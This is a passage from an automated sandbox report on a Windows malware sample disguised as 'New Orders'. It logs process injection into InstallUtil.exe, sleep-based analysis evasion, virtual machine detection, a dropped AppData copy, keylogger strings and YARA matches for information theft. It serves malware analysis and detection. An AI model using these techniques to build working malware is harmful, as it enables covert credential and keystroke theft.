                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe TID: 7428Thread sleep time: -98828s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe TID: 7428Thread sleep time: -98717s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe TID: 7428Thread sleep time: -98609s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe TID: 7428Thread sleep time: -98469s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe TID: 7428Thread sleep time: -98344s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe TID: 7428Thread sleep time: -98203s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe TID: 7428Thread sleep time: -98078s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep count: 31 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42668Thread sleep count: 4960 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -99857s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42668Thread sleep count: 4872 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -99749s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -99640s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -99528s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -99421s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -99312s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -99202s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -99093s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -98983s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -98859s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -98750s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -98640s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -98513s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -98389s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -98276s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -98169s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -98056s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -97952s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -97843s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -97734s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -97616s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -97500s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -97389s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -1199940s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -1199812s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -1199703s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -1199590s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -1199481s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -1199343s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -1199218s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -1199106s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -1198999s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -1198890s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -1198767s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -1198640s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -1198531s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -1198418s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -1198312s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -1198203s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -1198093s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -1197968s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -1197815s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -1197672s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -1197562s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -1197453s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -1197329s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -1197179s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -1197062s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -1196946s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -1196843s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 42664Thread sleep time: -1196734s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exe TID: 42840Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exe TID: 42432Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeThread delayed: delay time: 99875Jump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeThread delayed: delay time: 99763Jump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeThread delayed: delay time: 99655Jump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeThread delayed: delay time: 99545Jump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeThread delayed: delay time: 99418Jump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeThread delayed: delay time: 99312Jump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeThread delayed: delay time: 99203Jump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeThread delayed: delay time: 99087Jump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeThread delayed: delay time: 98953Jump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeThread delayed: delay time: 98828Jump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeThread delayed: delay time: 98717Jump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeThread delayed: delay time: 98609Jump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeThread delayed: delay time: 98469Jump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeThread delayed: delay time: 98344Jump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeThread delayed: delay time: 98203Jump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeThread delayed: delay time: 98078Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99857Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99749Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99640Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99528Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99421Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99312Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99202Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99093Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98983Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98859Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98750Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98640Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98513Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98389Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98276Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98169Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98056Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97952Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97843Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97616Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97389Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1199940Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1199812Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1199703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1199590Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1199481Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1199343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1199218Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1199106Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1198999Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1198890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1198767Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1198640Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1198531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1198418Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1198312Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1198203Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1198093Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1197968Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1197815Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1197672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1197562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1197453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1197329Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1197179Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1197062Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1196946Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1196843Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1196734Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeThread delayed: delay time: 922337203685477
                  Source: Amcache.hve.11.drBinary or memory string: VMware
                  Source: Amcache.hve.11.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.11.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.11.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.11.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.11.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.11.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.11.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.11.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.11.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.11.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.11.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: InstallUtil.exe, 00000007.00000002.2594076549.000000000632B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Amcache.hve.11.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.11.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.11.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.11.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.11.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.LOG1.11.dr, Amcache.hve.11.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.11.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.11.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.11.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
                  Source: Amcache.hve.11.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.11.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.LOG1.11.dr, Amcache.hve.11.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.11.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.11.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.11.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.11.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.11.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 440000Jump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: E03008Jump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exeJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exeJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exeJump to behavior
                  Source: InstallUtil.exe, 00000007.00000002.2590372149.000000000302E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR
                  Source: InstallUtil.exe, 00000007.00000002.2590372149.000000000302E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: InstallUtil.exe, 00000007.00000002.2590372149.000000000302E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q9<b>[ Program Manager]</b> (12/03/2024 12:52:54)<br>{Win}rTH
                  Source: InstallUtil.exe, 00000007.00000002.2590372149.000000000302E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q8<b>[ Program Manager]</b> (12/03/2024 12:52:54)<br>{Win}TH
                  Source: InstallUtil.exe, 00000007.00000002.2590372149.000000000302E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q3<b>[ Program Manager]</b> (12/03/2024 12:52:54)<br>
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeQueries volume information: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeQueries volume information: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeQueries volume information: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exe VolumeInformation
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.LOG1.11.dr, Amcache.hve.11.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.LOG1.11.dr, Amcache.hve.11.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.LOG1.11.dr, Amcache.hve.11.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.LOG1.11.dr, Amcache.hve.11.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.LOG1.11.dr, Amcache.hve.11.drBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.2587711713.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
